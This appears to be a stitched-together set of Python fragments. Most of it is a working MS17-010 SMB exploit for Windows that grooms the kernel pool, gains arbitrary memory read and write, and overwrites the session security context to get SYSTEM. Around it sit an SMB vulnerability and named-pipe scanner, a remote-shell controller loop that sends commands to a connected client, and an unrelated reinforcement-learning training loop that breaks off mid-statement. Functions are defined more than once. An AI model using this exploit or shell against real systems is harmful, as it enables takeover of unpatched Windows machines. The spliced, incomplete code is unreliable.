def worawit():
	target = args.target
	logger.blue('Connecting to: [{}]'.format(logger.BLUE(args.target)))

	if args.pipe:
		pipe_name = args.pipe
		logger.blue('Using specified pipe: [{}]'.format(logger.BLUE(args.pipe)))
	else:
		pipe_name = None	

	try:
		exploit(target, pipe_name)
		logger.green('FINISHED!')
	except Exception as e:
		logger.red('Exploit failed against [{}]: {}'.format(logger.RED(target), str(e)))
def worawit(target):
	try:
		logger.blue('Connecting to: [{}]'.format(logger.BLUE(target)))
		try:
			conn = MYSMB(target, timeout=5)
		except:
			logger.red('Failed to connect to [{}]'.format(logger.RED(target)))
			return False
		try:
			conn.login(USERNAME, PASSWORD)
		except smb.SessionError as e:
			logger.red('Authentication failed: [{}]'.format(logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0])))
			quit()
		finally:
			logger.blue('Got OS: [{}]'.format(logger.BLUE(conn.get_server_os())))

		tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
		conn.set_default_tid(tid)

		# test if target is vulnerable
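		# The check below sends a TRANS_PEEK_NMPIPE (PeekNamedPipe) transaction.
		# Hosts missing the MS17-010 patch answer with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205);
		# patched hosts return a different status (commonly STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED).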
		TRANS_PEEK_NMPIPE = 0x23
		recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
		status = recvPkt.getNTStatus()
		if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
			logger.green('[{}] IS NOT PATCHED!'.format(logger.GREEN(target)))
		else:
			logger.red('[{}] IS PATCHED!'.format(logger.RED(target)))
			quit()

		logger.blue('Checking named pipes...')
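		# Note: a successful bind with the NDR64 transfer syntax is taken as a hint that the
		# host is 64-bit; 32-bit targets typically reject NDR64 with 'transfer_syntaxes_not_supported'.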
		for pipe_name, pipe_uuid in pipes.items():
			try:
				dce = conn.get_dce_rpc(pipe_name)
				dce.connect()
				try:
					dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
					logger.green('\t-\t{}: OK (64 bit)'.format(logger.GREEN(pipe_name)))
				except DCERPCException as e:
					if 'transfer_syntaxes_not_supported' in str(e):
						logger.green('\t-\t{}: OK (32 bit)'.format(logger.GREEN(pipe_name)))
					else:
						logger.green('\t-\t{}: OK ({})'.format(logger.GREEN(pipe_name), str(e)))
				dce.disconnect()
			except smb.SessionError as e:
				logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0])))
			except smbconnection.SessionError as e:
				logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error][0])))

		conn.disconnect_tree(tid)
		conn.logoff()
		conn.get_socket().close()
	except (KeyboardInterrupt, SystemExit):
		logger.red('Keyboard interrupt received..')
		quit()
def run():
	target = args.target

	if args.user:
		if args.password is None:
			logger.red('Please specify username and password')
			quit()
		else:
			username = args.user
			password = args.password
	else:
		username = ''

	if args.password:
		if args.user is None:
			logger.red('Please specify username and password')
			quit()
		else:
			username = args.user
			password = args.password
	else:
		password = ''

	if args.domain:
		domain = args.domain
	else:
		domain = ''

	if args.pipe:
		pipe_name = args.pipe
		logger.blue('Using specified pipe: [{}]'.format(logger.BLUE(args.pipe)))
	else:
		pipe_name = None	

	try:
		result = exploit(target,username,password,pipe_name)
	except Exception as e:
		logger.red(str(e))
		quit()
	if result:
		logger.green('Exploit finished!')
	else:
		logger.red('Failed to finish exploit')
def exploit(target, pipe_name):

	conn = MYSMB(target)
	
	# set NODELAY to make exploit much faster
	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

	info = {}

	conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
	server_os = conn.get_server_os()
	logger.blue('OS: {}'.format(logger.BLUE(server_os)))

	if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
		info['os'] = 'WIN7'
		info['method'] = exploit_matched_pairs
	elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10") or server_os.startswith("Windows RT 9200"):
		info['os'] = 'WIN8'
		info['method'] = exploit_matched_pairs
	elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith("Windows Vista") or server_os.startswith("Windows (R) Web Server 2008"):
		info['os'] = 'WIN7'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows Server 2003 "):
		info['os'] = 'WIN2K3'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows 5.1"):
		info['os'] = 'WINXP'
		info['arch'] = 'x86'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows XP "):
		info['os'] = 'WINXP'
		info['arch'] = 'x64'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows 5.0"):
		info['os'] = 'WIN2K'
		info['arch'] = 'x86'
		info['method'] = exploit_fish_barrel
	else:
		logger.red("Target isn't supported...")
		quit()
	
	if pipe_name is None:
		pipe_name = find_named_pipe(conn)
		if pipe_name is None:
			logger.red("Couldn't get a named pipe...")
			return False
		logger.green('Using pipe: [{}]'.format(pipe_name))

	if not info['method'](conn, pipe_name, info):
		return False

	# Now, read_data() and write_data() can be used for arbitrary read and write.
	# ================================
	# Modify this SMB session to be SYSTEM
	# ================================	
	fmt = info['PTR_FMT']
	
	logger.blue('Creating SYSTEM Session')
	# IsNullSession = 0, IsAdmin = 1
	write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')

	# read session struct to get SecurityContext address
	sessionData = read_data(conn, info, info['session'], 0x100)
	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]

	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
		# Windows 2003 and earlier uses only ImpersonateSecurityContext() (with a PCtxtHandle struct) for impersonation.
		# Modifying the token seems to be difficult, but writing kernel shellcode for all old Windows versions is
		# much more difficult because data offsets in ETHREAD/EPROCESS differ between service packs.
		
		# find the token and modify it
		if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
			pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
			pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
		else:
			pctxtDataAddr = secCtxAddr

		tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
		tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
		logger.blue('Current Token Addr: 0x{:x}'.format(tokenAddr))
		
		# copy Token data for restoration
		tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
		
		# parse necessary data out of token
		userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)

		logger.blue('Overwriting Token [UserAndGroups]')
		# modify UserAndGroups info
		fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
		if fakeUserAndGroupCount != userAndGroupCount:
			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
		write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
	else:
		# the target can use PsImpersonateClient() for impersonation (Windows 2008 and later)
		# copy SecurityContext for restoration
		secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])

		logger.blue('Overwriting session security context')
		# see FAKE_SECCTX detail at top of the file
		write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])

	# ================================
	# do whatever we want as SYSTEM over this SMB connection
	# ================================	
	# try:
	smb_pwn(conn, info['arch'])
	# except:
	# 	pass

	# restore SecurityContext/Token
	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
		userAndGroupsOffset = userAndGroupsAddr - tokenAddr
		write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
		if fakeUserAndGroupCount != userAndGroupCount:
			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
	else:
		write_data(conn, info, secCtxAddr, secCtxData)

	conn.disconnect_tree(conn.get_tid())
	conn.logoff()
	conn.get_socket().close()
	return True
def exploit_fish_barrel(conn, pipe_name, info):
	# for Windows Vista/2008 and earlier
	
	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
	conn.set_default_tid(tid)
	# fid for the first open is always 0x4000. We can open the named pipe multiple times to get other fids.
	fid = conn.nt_create_andx(tid, pipe_name)
	info['fid'] = fid

	if info['os'] == 'WIN7' and 'arch' not in info:
		# leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
		info.update(leak_frag_size(conn, tid, fid))
	
	if 'arch' in info:
		# add os and arch specific exploit info
		info.update(OS_ARCH_INFO[info['os']][info['arch']])
		attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
	else:
		# the target architecture is unknown (this case applies only to Windows 2003)
		# try 64-bit offsets first, then 32-bit
		attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
	
	# ================================
	# groom packets
	# ================================
	# sum of transaction name, parameters and data length is 0x1000
	# parameterCount = 0x100-TRANS_NAME_LEN
	logger.blue('Groom Packets')
	trans_param = pack('<HH', info['fid'], 0)
	for i in range(12):
		mid = info['fid'] if i == 8 else next_extra_mid()
		conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)	
	
	# expected transactions alignment
	#
	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
	#    |  mid=mid1 |  mid=mid2 |             |  mid=mid8 |  mid=fid  |  mid=mid9 | mid=mid10 | mid=mid11 |
	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
	#                                                         trans1       trans2

	# ================================
	# shift transaction Indata ptr with SmbWriteAndX
	# ================================
	shift_indata_byte = 0x200
	conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
	
	# ================================
	# Dangerous operation: attempt to control one transaction
	# ================================
	# Note: POOL_ALIGN value is same as heap alignment value
	success = False
	for tinfo in attempt_list:
		logger.blue('Attempting to control next transaction ' + tinfo['ARCH'])

		HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
		NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
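		# Rough derivation of NEXT_TRANS_OFFSET: each groomed chunk holds 0x1000 bytes of
		# transaction name+parameters+data (see the groom above) and InData starts 0x100 bytes
		# into that region, so 0xf00 bytes remain to the end of the chunk. Subtract the 0x200
		# InData shift done with SmbWriteAndX, then skip the pool padding and the heap header
		# to land on the next transaction struct.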

		# The operation below is dangerous. Writing only 1 byte of '\x00' should be relatively safe even if the alignment is wrong.
		conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
		wait_for_request_processed(conn)

		# if the overwrite is correct, the modified transaction's mid should be special_mid now.
		# a new transaction with special_mid should return an error.
		recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
		if recvPkt.getNTStatus() == 0x10002:  # invalid SMB
			logger.green('Successfully controlled one transaction!')
			success = True
			if 'arch' not in info:
				logger.blue('Target is '+tinfo['ARCH'])
				info['arch'] = tinfo['ARCH']
				info.update(OS_ARCH_INFO[info['os']][info['arch']])
			break
		if recvPkt.getNTStatus() != 0:
			logger.red('Unexpected Return Status: [0x{:x}]'.format(recvPkt.getNTStatus()))
	
	if not success:
		logger.red('Unexpected Return Status: 0x{:x}'.format(recvPkt.getNTStatus()))
		logger.red('May have written to the wrong place')
		logger.red('Target may have crashed...')
		return False


	# NSA EternalRomance modifies the transaction RefCount to keep control of it and reuse the transaction after leaking info.
	# This is easy to do, but the modified transaction will never be freed. The next exploit attempt might be harder
	#   because of this unfreed memory chunk, so I avoid it.
	
	# From the picture above, we can now control only trans2, through trans1's data. We also know only the offsets of these two
	#   transactions (not their addresses).
	# After reading memory by modifying and completing trans2, trans2 cannot be used anymore.
	# To be able to use trans1 after trans2 is gone, we need to make trans1 able to modify itself.
	# To be able to modify the trans1 struct, we need to use trans2's param or data but write backwards.
	# On a 32-bit target, we can write to any address if the parameter count is 0xffffffff.
	# On a 64-bit target, modifying the parameter count is not enough because addresses are 64-bit. Because our transactions
	#   are allocated with RtlAllocateHeap(), the HIDWORD of InParameter is always 0. To be able to write backwards with an offset only,
	#   we also modify the HIDWORD of InParameter to 0xffffffff.
	
	logger.blue('Modifying parameter count to 0xffffffff to write backwards')
	conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
	# on 64 bit, modify InParameter last 4 bytes to \xff\xff\xff\xff too
	if info['arch'] == 'x64':
		conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
	wait_for_request_processed(conn)
	
	TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
	PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
	PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT
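	# Worked example of the backward write: the server computes the target address as
	# InParameter + paramDisplacement, so a displacement of 0x100000000 - PREV_TRANS_DISPLACEMENT
	# wraps modulo 2^32 and is equivalent to InParameter - PREV_TRANS_DISPLACEMENT, i.e. a write
	# onto the previous transaction (trans1). The 0xffffffff totalParameterCount set above is what
	# lets such a large displacement pass the bounds check; on x64 the HIDWORD of InParameter is
	# additionally set to 0xffffffff so the 64-bit pointer addition wraps as well.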

	# modify parameterCount of the first transaction
	conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
	if info['arch'] == 'x64':
		conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
		# restore trans2.InParameters pointer before leaking next transaction
		conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
	wait_for_request_processed(conn)

	# ================================
	# leak transaction
	# ================================
	logger.blue('Leaking next transaction')
	# modify TRANSACTION member to leak info
	# function=5 (NT_TRANS_RENAME)
	conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
	# parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
	conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])

	conn.send_nt_trans_secondary(mid=special_mid)
	leakData = conn.recv_transaction_data(special_mid, 0x100)
	leakData = leakData[4:]  # remove param
	#open('leak.dat', 'wb').write(leakData)

	# check heap chunk size value in leak data
	if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
		logger.red('Chunk size is wrong...')
		return False

	# extract the leaked transaction data and make the next transaction the new trans2
	leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
	leakTrans = leakData[leakTranOffset:]
	fmt = info['PTR_FMT']
	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
	inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
	trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
	
	logger.blue('Connection: 0x{:x}'.format(connection_addr))
	logger.blue('Session: 0x{:x}'.format(session_addr))
	logger.blue('Flink: 0x{:x}'.format(flink_value))
	logger.blue('InData: 0x{:x}'.format(indata_value))
	logger.blue('MID: 0x{:x}'.format(trans2_mid))
	
	trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
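	# the leaked transaction (the chunk that follows trans2) becomes the new trans2,
	# so trans1 (mid=fid) now sits two full transaction chunks before it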
	trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
	logger.blue('Trans1: 0x{:x}'.format(trans1_addr))
	logger.blue('Trans2: 0x{:x}'.format(trans2_addr))
	
	# ================================
	# modify trans struct to be used for arbitrary read/write
	# ================================
	logger.blue('Modifying transaction structs for arbitrary read/write')
	# modify
	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
	# Note: HIDWORD of trans1.InParameter is still 0xffffffff
	TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
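	# TRANS_OFFSET is another 2^32 wrap: trans1.InParameter points TRANS_SIZE + TRANS_NAME_LEN
	# bytes past the start of the trans1 struct, so this displacement makes the write land on
	# the trans1 struct itself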
	conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
	wait_for_request_processed(conn)
	
	# modify trans1.mid
	trans1_mid = conn.next_mid()
	conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
	wait_for_request_processed(conn)
	
	info.update({
		'connection': connection_addr,
		'session': session_addr,
		'trans1_mid': trans1_mid,
		'trans1_addr': trans1_addr,
		'trans2_mid': trans2_mid,
		'trans2_addr': trans2_addr,
	})
	return True
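# wait_for_request_processed() is referenced above but not included in this listing.
# A minimal sketch of what it presumably does, based on the original zzz_exploit.py:
# a cheap request/response round trip is used to make sure the server has processed
# the previously sent packets before the next step depends on their side effects.
def wait_for_request_processed(conn):
	# any request that produces a response works as a synchronization point;
	# an SMB echo is faster than sleeping
	conn.send_echo('a')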
def exploit_matched_pairs(conn, pipe_name, info):
	# for Windows 7/2008 R2 and later
	
	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
	conn.set_default_tid(tid)
	# fid for the first open is always 0x4000. We can open the named pipe multiple times to get other fids.
	fid = conn.nt_create_andx(tid, pipe_name)
	
	info.update(leak_frag_size(conn, tid, fid))
	# add os and arch specific exploit info
	info.update(OS_ARCH_INFO[info['os']][info['arch']])
	
	# groom: srv buffer header
	info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
	logger.blue('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
	# groom parameters and data are aligned to 8 because it is an NT_TRANS
	info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']  # alignment (4)

	# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
	bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
	info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
	logger.blue('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
	# bride parameters and data are aligned to 4 because it is a TRANS
	info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
	
	# ================================
	# try to align the paged pool and leak info until satisfied
	# ================================
	leakInfo = None
	# max attempts: 10
	for i in range(10):
		reset_extra_mid(conn)
		leakInfo = align_transaction_and_leak(conn, tid, fid, info)
		if leakInfo is not None:
			break
		logger.red('Leak failed! Retrying...')
		conn.close(tid, fid)
		conn.disconnect_tree(tid)
		
		tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
		conn.set_default_tid(tid)
		fid = conn.nt_create_andx(tid, pipe_name)

	if leakInfo is None:
		return False
	
	info['fid'] = fid
	info.update(leakInfo)

	# ================================
	# shift transGroom.Indata ptr with SmbWriteAndX
	# ================================
	shift_indata_byte = 0x200
	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)

	# Note: Even if the distance between bride transactions is exactly what we want, the groom transaction might be in the wrong place.
	#       So the operation below is still dangerous. Writing only 1 byte of '\x00' should be relatively safe even if the alignment is wrong.
	# maxParameterCount (0x1000), trans name (4), param (4)
	indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
	indata_next_trans_displacement = info['trans2_addr'] - indata_value
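	# indata_next_trans_displacement: distance from the groom transaction's shifted InData
	# pointer to the bride transaction (trans2), so the one-byte write below lands exactly
	# on trans2's mid field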
	conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
	wait_for_request_processed(conn)

	# if the overwrite is correct, the modified transaction's mid should be special_mid now.
	# a new transaction with special_mid should return an error.
	recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
	if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
		logger.red('Unexpected return status: [0x{:x}]'.format(recvPkt.getNTStatus()))
		logger.red('May have written to the wrong place')
		logger.red('Target may have crashed...')
		return False

	logger.green('Successfully controlled the Groom Transaction')

	# The NSA exploit sets refCnt on the leaked transaction to a very large number so data can be read repeatedly,
	# but this method means the transaction never gets freed.
	# I will avoid the memory leak.
	
	# ================================
	# modify trans1 struct to be used for arbitrary read/write
	# ================================
	logger.blue('Modifying Trans1 Struct for Read/Write')
	fmt = info['PTR_FMT']
	# use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data
	conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
	wait_for_request_processed(conn)

	# modify
	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
	conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
	wait_for_request_processed(conn)

	# modify trans2.mid
	info['trans2_mid'] = conn.next_mid()
	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
	return True
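# calc_alloc_size() is used by exploit_matched_pairs() but is not part of this listing.
# A minimal sketch under the assumption that it simply rounds a size up to the pool
# alignment, which is how the original zzz_exploit.py implements it:
def calc_alloc_size(size, alignment):
	# round size up to the next multiple of alignment
	return (size + alignment - 1) & ~(alignment - 1)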
def worawit(target):
    try:
        try:
            conn = MYSMB(target, timeout=5)
        except:
            logger.red('Unable to connect to [{}]'.format(logger.RED(target)))
            return False
        try:
            conn.login(USERNAME, PASSWORD)
        except:
            logger.red('Failed to authenticate to [{}]'.format(
                logger.RED(target)))
            return False
        finally:
            try:
                OS = conn.get_server_os()
            except Exception as e:
                logger.red(str(e))
                return False

        tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
        conn.set_default_tid(tid)

        # test if target is vulnerable
        TRANS_PEEK_NMPIPE = 0x23
        recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE),
                                  maxParameterCount=0xffff,
                                  maxDataCount=0x800)
        status = recvPkt.getNTStatus()
        if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
            logger.green('[%s] VULNERABLE' % logger.GREEN(target))
            vulnerable[target] = []
        else:
            logger.red('[%s] PATCHED' % logger.RED(target))

        pipes_found = []

        for pipe_name, pipe_uuid in pipes.items():
            try:
                dce = conn.get_dce_rpc(pipe_name)
                dce.connect()
                try:
                    dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
                except DCERPCException:
                    # the pipe is reachable even if the bind fails
                    # (e.g. transfer_syntaxes_not_supported on 32-bit targets)
                    pass
                pipes_found.append(pipe_name)
                dce.disconnect()
                vulnerable[target] = pipes_found
            except smb.SessionError as e:
                continue
            except smbconnection.SessionError as e:
                continue

        conn.disconnect_tree(tid)
        conn.logoff()
        conn.get_socket().close()
    except KeyboardInterrupt:
        logger.red('Keyboard interrupt received..')
        quit()
def set_server_path(path):
    global server_path
    server_path = path


def get_server_path():
    return server_path


send_data(client, "cd .")
commands["cd"]["function"]("cd .", recv_data(client))

while 1:
    command = raw_input(
        red(sysinfo[5]) + yellow("@") + blue(sysinfo[1]) +
        yellow(":" + get_server_path()) + green("> "))
    if command.strip() == "":
        continue

    keyword = command.split(" ")[0]
    try:
        if run_custom(keyword, command):
            continue

        if command == "show_output":
            print prev_data
            continue

        send_data(client, transform_cmd(keyword, command))
        if command.lower() == "exit":
            s.close()
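# send_data()/recv_data() are not included in this fragment. A minimal, hypothetical
# sketch assuming they are thin wrappers around the connected TCP socket (the real
# helpers may frame, encode or encrypt the traffic):
def send_data(sock, data):
    # send a command string to the connected client
    sock.sendall(data)


def recv_data(sock, bufsize=4096):
    # receive a single response chunk from the client
    return sock.recv(bufsize)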
def train():
    from linear_schedule import Linear

    ledger = defaultdict(lambda: MovingAverage(Reporting.reward_average))

    M.config(file=os.path.join(RUN.log_directory, RUN.log_file))
    M.diff()

    with U.make_session(
            RUN.num_cpu), Logger(RUN.log_directory) as logger, contextify(
                gym.make(G.env_name)) as env:
        env = ScaledFloatFrame(wrap_dqn(env))

        if G.seed is not None:
            env.seed(G.seed)
        logger.log_params(G=vars(G), RUN=vars(RUN), Reporting=vars(Reporting))
        inputs = TrainInputs(action_space=env.action_space,
                             observation_space=env.observation_space)
        trainer = QTrainer(inputs=inputs,
                           action_space=env.action_space,
                           observation_space=env.observation_space)
        if G.prioritized_replay:
            replay_buffer = PrioritizedReplayBuffer(size=G.buffer_size,
                                                    alpha=G.alpha)
        else:
            replay_buffer = ReplayBuffer(size=G.buffer_size)

        class schedules:
            # note: it is important to have this start from the beginning.
            eps = Linear(G.n_timesteps * G.exploration_fraction, 1,
                         G.final_eps)
            if G.prioritized_replay:
                beta = Linear(G.n_timesteps - G.learning_start, G.beta_start,
                              G.beta_end)

        U.initialize()
        trainer.update_target()
        x = np.array(env.reset())
        ep_ind = 0
        M.tic('episode')
        for t_step in range(G.n_timesteps):
            # schedules
            eps = 0 if G.param_noise else schedules.eps[t_step]
            if G.prioritized_replay:
                beta = schedules.beta[t_step - G.learning_start]

            x0 = x
            M.tic('sample', silent=True)
            (action, *_), action_q, q = trainer.runner.act([x], eps)
            x, rew, done, info = env.step(action)
            ledger['action_q_value'].append(action_q.max())
            ledger['action_q_value/mean'].append(action_q.mean())
            ledger['action_q_value/var'].append(action_q.var())
            ledger['q_value'].append(q.max())
            ledger['q_value/mean'].append(q.mean())
            ledger['q_value/var'].append(q.var())
            ledger['timing/sample'].append(M.toc('sample', silent=True))
            # note: adding a sample to the buffer is identical between the prioritized and the standard replay strategies.
            replay_buffer.add(s0=x0,
                              action=action,
                              reward=rew,
                              s1=x,
                              done=float(done))

            logger.log(
                t_step, {
                    'q_value': ledger['q_value'].latest,
                    'q_value/mean': ledger['q_value/mean'].latest,
                    'q_value/var': ledger['q_value/var'].latest,
                    'q_value/action': ledger['action_q_value'].latest,
                    'q_value/action/mean':
                    ledger['action_q_value/mean'].latest,
                    'q_value/action/var': ledger['action_q_value/var'].latest
                },
                action=action,
                eps=eps,
                silent=True)

            if G.prioritized_replay:
                logger.log(t_step, beta=beta, silent=True)

            if done:
                ledger['timing/episode'].append(M.split('episode',
                                                        silent=True))
                ep_ind += 1
                x = np.array(env.reset())
                ledger['rewards'].append(info['total_reward'])

                silent = (ep_ind % Reporting.print_interval != 0)
                logger.log(t_step,
                           timestep=t_step,
                           episode=green(ep_ind),
                           total_reward=ledger['rewards'].latest,
                           episode_length=info['timesteps'],
                           silent=silent)
                logger.log(t_step, {
                    'total_reward/mean':
                    yellow(ledger['rewards'].mean, lambda v: f"{v:.1f}"),
                    'total_reward/max':
                    yellow(ledger['rewards'].max, lambda v: f"{v:.1f}"),
                    "time_spent_exploring":
                    default(eps, percent),
                    "timing/episode":
                    green(ledger['timing/episode'].latest, sec),
                    "timing/episode/mean":
                    green(ledger['timing/episode'].mean, sec),
                },
                           silent=silent)
                try:
                    logger.log(t_step, {
                        "timing/sample":
                        default(ledger['timing/sample'].latest, sec),
                        "timing/sample/mean":
                        default(ledger['timing/sample'].mean, sec),
                        "timing/train":
                        default(ledger['timing/train'].latest, sec),
                        "timing/train/mean":
                        green(ledger['timing/train'].mean, sec),
                        "timing/log_histogram":
                        default(ledger['timing/log_histogram'].latest, sec),
                        "timing/log_histogram/mean":
                        default(ledger['timing/log_histogram'].mean, sec)
                    },
                               silent=silent)
                    if G.prioritized_replay:
                        logger.log(t_step, {
